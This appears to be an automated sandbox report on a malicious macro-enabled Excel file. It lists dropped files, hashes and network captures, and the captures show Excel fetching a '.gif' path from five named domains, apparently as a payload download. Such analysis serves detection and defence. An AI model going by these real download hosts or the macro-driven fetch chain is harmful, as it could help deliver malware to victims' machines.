                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 16:46:39 2021, atime=Wed Apr 7 16:46:39 2021, length=12288, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.47926401566195
                Encrypted:false
                SSDEEP:12:85QMNa3LgXg/XAlCPCHaXgzB8IB/6UxuX+Wnicvb3bDtZ3YilMMEpxRljKg1yTdK:85py/XTwz6IwYefDv3qXqrNru/
                MD5:64C9E07A23ED6F71462819388A106F9B
                SHA1:949D424E51372DC171CBF44657A5C356BE9F4802
                SHA-256:C300CFCAA84EF8230D11DEAA7F7D385AD4C42DDAF986484706914384F8D35014
                SHA-512:02CF2701B62DDEC413A2C29358FD20EB24064E1E4F5414BE7A9BE3339D5B7DAFED98C3BE13F1816EC26DFF35CBDA4347BE1E130784A4CCDE26C97A37B64A8BAC
                Malicious:false
                Preview: L..................F...........7G....T..+....T..+...0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R...Desktop.d......QK.X.R.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\830021\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......830021..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-933340782.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Apr 7 16:46:39 2021, atime=Wed Apr 7 16:46:39 2021, length=108482, window=hide
                Category:dropped
                Size (bytes):2118
                Entropy (8bit):4.53890434678891
                Encrypted:false
                SSDEEP:24:8V/XTwz6IknpTNe3RBtDv3qXqdM7dD2V/XTwz6IknpTNe3RBtDv3qXqdM7dV:8V/XT3IkpZMHsaQh2V/XT3IkpZMHsaQ/
                MD5:80F9BD0D08F74462CBB9348AE22D2EF9
                SHA1:1207BA7A83F0D892BF874DA10098F18E21DF9EFE
                SHA-256:4C38DB76F6983416C691A348FBA03714F8BE499ADFA1F8F2993507A5FCC48B50
                SHA-512:33302294ADBE7A95CBCAA0BF10F70BCDFFA06B74F156F1A1A3D2880D4D4CB916B17BDAD8FAD3D4543516E6DCE90E174828225337C8934D7FAFDFD26CA70687DE
                Malicious:false
                Preview: L..................F.... ....mC..{....T..+..gc^..+..............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2.....R. .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.9.3.3.3.4.0.7.8.2...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\830021\Users.user\Desktop\document-933340782.xlsm.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.9.3.3.3.4.0.7.8.2...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......830021..........D_....3N.
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):109
                Entropy (8bit):4.750124550037971
                Encrypted:false
                SSDEEP:3:oyBVomxWKS9LRzSShBCZELRzSShBCmxWKS9LRzSShBCv:dj49LdhhmELdhh89Ldhh2
                MD5:3964574BC9DD3C18B48C07D1334EDABC
                SHA1:F3A4E8168156D52D261727B6D09867A7488C6E2B
                SHA-256:A8B88213A4FC40A7ECC677D7EAA84C51DDD0BC729002ADDF34DE36230409D12B
                SHA-512:FC07F8BA89E7D859D109C71A9F07CD8C52AA6DFB4FEF77D76ECAD4AF12DE77B97C49ED28F6779DE5AEE32B9D580D2064DBD888C5626A75EC672078DDE976E376
                Malicious:false
                Preview: Desktop.LNK=0..[misc]..document-933340782.LNK=0..document-933340782.LNK=0..[misc]..document-933340782.LNK=0..
                C:\Users\user\Desktop\82DE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):108482
                Entropy (8bit):7.912405123821417
                Encrypted:false
                SSDEEP:3072:GJrWNPTGqT+dY71DzPjEwqtDxNko+bJ99K7meX7pr2:GGPTGa08NjYDp+d9imeX7pr2
                MD5:75D5EBE3BB27E63BB7B1B3BFAD5466B0
                SHA1:17E6B14CCF5F5F650F3C1241DFFD4C1E53E5EE3A
                SHA-256:E2B376D8A9093A89C3427258C2A52BF5B35030144F74295A4B130F17E9C9B464
                SHA-512:27AA12625B373CA99F02D080681BD4B51A6AB1C5DCC8B6E15CAF5D87DBDC1A418472DA0B3B5BC16133B8A5611AA20D84154DC8141D615AB2054A7087B4C2CF0A
                Malicious:false
                Preview: .U.N.0..#.?D....#4j.b........mb./..h..k7.......>......."j.Zv.LX.Nz.]..wW.9.0.....Z..d...'.u....e}J.7.({........G+.....B.E..l2..w.\.S.`.._X.{....].8.k.?...T.D.FK..(.pjG.........D.`. ....&DM...R.`..^...Mm..|}?"........%..:.O*.B^9...G.....F.t-,..W.?...{.l...2-..`..Xc......Z..=;<.T.....;$.>$../').#>.....y..m..za.....b.}S.D..x..|.f$8.......1.^DP...t...^s..PQ<f.|......c.4.n..H.4.....=.]."..4l....U...q....y.+P{.yy.........PK..........!...`.............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\Desktop\~$document-933340782.xlsm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:true
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                C:\Users\user\iekdhfe.dsk
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:HTML document, ASCII text, with very long lines
                Category:dropped
                Size (bytes):7295
                Entropy (8bit):5.637267147483986
                Encrypted:false
                SSDEEP:192:ElVZHCkA26xd3Qk/uTtMy47R/Ga0kVhFuPwf8Pn9wHHyJS:EJ8VGaRF8I8K
                MD5:AFC83AE7C4EA82B533D9B8731AAB3E80
                SHA1:A77EB9C6E5472FE4A17385ACB32BF96C9F69A65F
                SHA-256:FDF900267092BC67BD7786B86C462E69F9ED52BED838809B6BA28B298BE879F6
                SHA-512:5CF249AFF46D7B7C1BE5F2F2CA3D771E6EEB9B85EF8D6CE8BB93DFEEB0957F9E8BF15FC4B57D98A19F76E49C51A68C957EDC6CB98CCC15AE3215BC326D968CF7
                Malicious:false
                Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;. }. .additional-info {.

                Static File Info

                General

                File type:Microsoft Excel 2007+
                Entropy (8bit):7.912414325558474
                TrID:
                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                • ZIP compressed archive (8000/1) 16.67%
                File name:document-933340782.xlsm
                File size:108510
                MD5:766f5bb363db9a966b613a42a118798a
                SHA1:57e67742fd7e7fa0badddca5b2cceb4cf09048a7
                SHA256:9952ce93009bb9fe2b687053da8db61f551cd524ca2691669257c35aaba18832
                SHA512:3157b083902de46d1aaf75ac978537b479350c145a667c16965936f3ec9c84f08768604abbb4b54a12d37b8ce6b89136651b8083032887e730e6078b49cdaae9
                SSDEEP:3072:Q26TGqT+dY7EDzPjEwqtDlko+bJ99K7meX7pD3:QLTGa084jYDv+d9imeX7pD3
                File Content Preview:PK..........!...`.............[Content_Types].xml ...(..............................................................................................................................................................................................##.........

                File Icon

                Icon Hash:e4e2aa8aa4bcbcac

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "document-933340782.xlsm"

                Indicators

                Has Summary Info:
                Application Name:
                Encrypted Document:
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:

                Macro 4.0 Code

                ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Apr 7, 2021 10:46:54.075469971 CEST4916780192.168.2.2250.23.112.133
                Apr 7, 2021 10:46:54.248955965 CEST804916750.23.112.133192.168.2.22
                Apr 7, 2021 10:46:54.249090910 CEST4916780192.168.2.2250.23.112.133
                Apr 7, 2021 10:46:54.249636889 CEST4916780192.168.2.2250.23.112.133
                Apr 7, 2021 10:46:54.423564911 CEST804916750.23.112.133192.168.2.22
                Apr 7, 2021 10:46:54.427109003 CEST804916750.23.112.133192.168.2.22
                Apr 7, 2021 10:46:54.427304029 CEST4916780192.168.2.2250.23.112.133
                Apr 7, 2021 10:46:54.430351973 CEST4916780192.168.2.2250.23.112.133
                Apr 7, 2021 10:46:54.877640009 CEST4916780192.168.2.2250.23.112.133
                Apr 7, 2021 10:46:55.087573051 CEST804916750.23.112.133192.168.2.22
                Apr 7, 2021 10:46:55.087595940 CEST804916750.23.112.133192.168.2.22
                Apr 7, 2021 10:46:55.087610960 CEST804916750.23.112.133192.168.2.22
                Apr 7, 2021 10:46:55.087620974 CEST804916750.23.112.133192.168.2.22
                Apr 7, 2021 10:46:55.087632895 CEST804916750.23.112.133192.168.2.22
                Apr 7, 2021 10:46:55.087821007 CEST4916780192.168.2.2250.23.112.133
                Apr 7, 2021 10:46:55.274617910 CEST4916880192.168.2.2231.170.166.139
                Apr 7, 2021 10:46:55.393896103 CEST804916831.170.166.139192.168.2.22
                Apr 7, 2021 10:46:55.395517111 CEST4916880192.168.2.2231.170.166.139
                Apr 7, 2021 10:46:55.395570040 CEST4916880192.168.2.2231.170.166.139
                Apr 7, 2021 10:46:55.515464067 CEST804916831.170.166.139192.168.2.22
                Apr 7, 2021 10:46:55.620822906 CEST804916831.170.166.139192.168.2.22
                Apr 7, 2021 10:46:55.620996952 CEST4916880192.168.2.2231.170.166.139
                Apr 7, 2021 10:46:55.794830084 CEST4916980192.168.2.22143.95.33.96
                Apr 7, 2021 10:46:55.941339016 CEST8049169143.95.33.96192.168.2.22
                Apr 7, 2021 10:46:55.941493988 CEST4916980192.168.2.22143.95.33.96
                Apr 7, 2021 10:46:55.942820072 CEST4916980192.168.2.22143.95.33.96
                Apr 7, 2021 10:46:56.088896990 CEST8049169143.95.33.96192.168.2.22
                Apr 7, 2021 10:46:56.220531940 CEST8049169143.95.33.96192.168.2.22
                Apr 7, 2021 10:46:56.220602989 CEST4916980192.168.2.22143.95.33.96
                Apr 7, 2021 10:46:56.221170902 CEST4916980192.168.2.22143.95.33.96
                Apr 7, 2021 10:46:56.228161097 CEST8049169143.95.33.96192.168.2.22
                Apr 7, 2021 10:46:56.228245020 CEST4916980192.168.2.22143.95.33.96
                Apr 7, 2021 10:46:56.280091047 CEST4917080192.168.2.22103.68.166.129
                Apr 7, 2021 10:46:56.369083881 CEST8049169143.95.33.96192.168.2.22
                Apr 7, 2021 10:46:56.369193077 CEST4916980192.168.2.22143.95.33.96
                Apr 7, 2021 10:46:56.390928984 CEST8049170103.68.166.129192.168.2.22
                Apr 7, 2021 10:46:56.391096115 CEST4917080192.168.2.22103.68.166.129
                Apr 7, 2021 10:46:56.392405987 CEST4917080192.168.2.22103.68.166.129
                Apr 7, 2021 10:46:56.506817102 CEST8049170103.68.166.129192.168.2.22
                Apr 7, 2021 10:46:56.506926060 CEST4917080192.168.2.22103.68.166.129
                Apr 7, 2021 10:46:56.739958048 CEST4917180192.168.2.2266.36.231.40
                Apr 7, 2021 10:46:56.840977907 CEST804917166.36.231.40192.168.2.22
                Apr 7, 2021 10:46:56.841373920 CEST4917180192.168.2.2266.36.231.40
                Apr 7, 2021 10:46:56.842498064 CEST4917180192.168.2.2266.36.231.40
                Apr 7, 2021 10:46:56.944106102 CEST804917166.36.231.40192.168.2.22
                Apr 7, 2021 10:46:57.104089022 CEST804917166.36.231.40192.168.2.22
                Apr 7, 2021 10:46:57.104269981 CEST4917180192.168.2.2266.36.231.40
                Apr 7, 2021 10:47:01.456758976 CEST804916831.170.166.139192.168.2.22
                Apr 7, 2021 10:47:01.456913948 CEST4916880192.168.2.2231.170.166.139
                Apr 7, 2021 10:48:00.087519884 CEST804916750.23.112.133192.168.2.22
                Apr 7, 2021 10:48:00.090121984 CEST4916780192.168.2.2250.23.112.133
                Apr 7, 2021 10:48:02.100714922 CEST804917166.36.231.40192.168.2.22
                Apr 7, 2021 10:48:02.100928068 CEST4917180192.168.2.2266.36.231.40
                Apr 7, 2021 10:48:53.845046997 CEST4917180192.168.2.2266.36.231.40
                Apr 7, 2021 10:48:53.845238924 CEST4917080192.168.2.22103.68.166.129
                Apr 7, 2021 10:48:53.845417023 CEST4916880192.168.2.2231.170.166.139
                Apr 7, 2021 10:48:53.845612049 CEST4916780192.168.2.2250.23.112.133
                Apr 7, 2021 10:48:53.945624113 CEST804917166.36.231.40192.168.2.22
                Apr 7, 2021 10:48:53.956664085 CEST8049170103.68.166.129192.168.2.22
                Apr 7, 2021 10:48:53.956782103 CEST4917080192.168.2.22103.68.166.129
                Apr 7, 2021 10:48:54.019201040 CEST804916750.23.112.133192.168.2.22
                Apr 7, 2021 10:48:54.187586069 CEST4916880192.168.2.2231.170.166.139
                Apr 7, 2021 10:48:54.858479977 CEST4916880192.168.2.2231.170.166.139
                Apr 7, 2021 10:48:56.184684992 CEST4916880192.168.2.2231.170.166.139
                Apr 7, 2021 10:48:58.836857080 CEST4916880192.168.2.2231.170.166.139

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Apr 7, 2021 10:46:53.897473097 CEST5219753192.168.2.228.8.8.8
                Apr 7, 2021 10:46:54.057022095 CEST53521978.8.8.8192.168.2.22
                Apr 7, 2021 10:46:55.112276077 CEST5309953192.168.2.228.8.8.8
                Apr 7, 2021 10:46:55.270534992 CEST53530998.8.8.8192.168.2.22
                Apr 7, 2021 10:46:55.637224913 CEST5283853192.168.2.228.8.8.8
                Apr 7, 2021 10:46:55.792998075 CEST53528388.8.8.8192.168.2.22
                Apr 7, 2021 10:46:56.232707977 CEST6120053192.168.2.228.8.8.8
                Apr 7, 2021 10:46:56.276132107 CEST53612008.8.8.8192.168.2.22
                Apr 7, 2021 10:46:56.523128986 CEST4954853192.168.2.228.8.8.8
                Apr 7, 2021 10:46:56.735892057 CEST53495488.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Apr 7, 2021 10:46:53.897473097 CEST192.168.2.228.8.8.80xbf29Standard query (0)kristen.sbddev.comA (IP address)IN (0x0001)
                Apr 7, 2021 10:46:55.112276077 CEST192.168.2.228.8.8.80xfbebStandard query (0)tienda.ventadigital.com.arA (IP address)IN (0x0001)
                Apr 7, 2021 10:46:55.637224913 CEST192.168.2.228.8.8.80xccaeStandard query (0)thirdstringcalifornia.comA (IP address)IN (0x0001)
                Apr 7, 2021 10:46:56.232707977 CEST192.168.2.228.8.8.80x887eStandard query (0)holmesservices.mobiledevsite.coA (IP address)IN (0x0001)
                Apr 7, 2021 10:46:56.523128986 CEST192.168.2.228.8.8.80x315eStandard query (0)nellaimasthanbiryani.comA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Apr 7, 2021 10:46:54.057022095 CEST8.8.8.8192.168.2.220xbf29No error (0)kristen.sbddev.com50.23.112.133A (IP address)IN (0x0001)
                Apr 7, 2021 10:46:55.270534992 CEST8.8.8.8192.168.2.220xfbebNo error (0)tienda.ventadigital.com.ar31.170.166.139A (IP address)IN (0x0001)
                Apr 7, 2021 10:46:55.792998075 CEST8.8.8.8192.168.2.220xccaeNo error (0)thirdstringcalifornia.com143.95.33.96A (IP address)IN (0x0001)
                Apr 7, 2021 10:46:56.276132107 CEST8.8.8.8192.168.2.220x887eNo error (0)holmesservices.mobiledevsite.co103.68.166.129A (IP address)IN (0x0001)
                Apr 7, 2021 10:46:56.735892057 CEST8.8.8.8192.168.2.220x315eNo error (0)nellaimasthanbiryani.com66.36.231.40A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • kristen.sbddev.com
                • tienda.ventadigital.com.ar
                • thirdstringcalifornia.com
                • holmesservices.mobiledevsite.co
                • nellaimasthanbiryani.com

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.224916750.23.112.13380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Apr 7, 2021 10:46:54.249636889 CEST0OUTGET /ds/2803.gif HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: kristen.sbddev.com
                Connection: Keep-Alive
                Apr 7, 2021 10:46:54.427109003 CEST1INHTTP/1.1 302 Found
                Server: nginx/1.18.0
                Date: Wed, 07 Apr 2021 08:46:54 GMT
                Content-Type: text/html; charset=iso-8859-1
                Content-Length: 235
                Connection: keep-alive
                Location: http://kristen.sbddev.com/cgi-sys/suspendedpage.cgi
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6b 72 69 73 74 65 6e 2e 73 62 64 64 65 76 2e 63 6f 6d 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://kristen.sbddev.com/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>
                Apr 7, 2021 10:46:54.430351973 CEST1OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
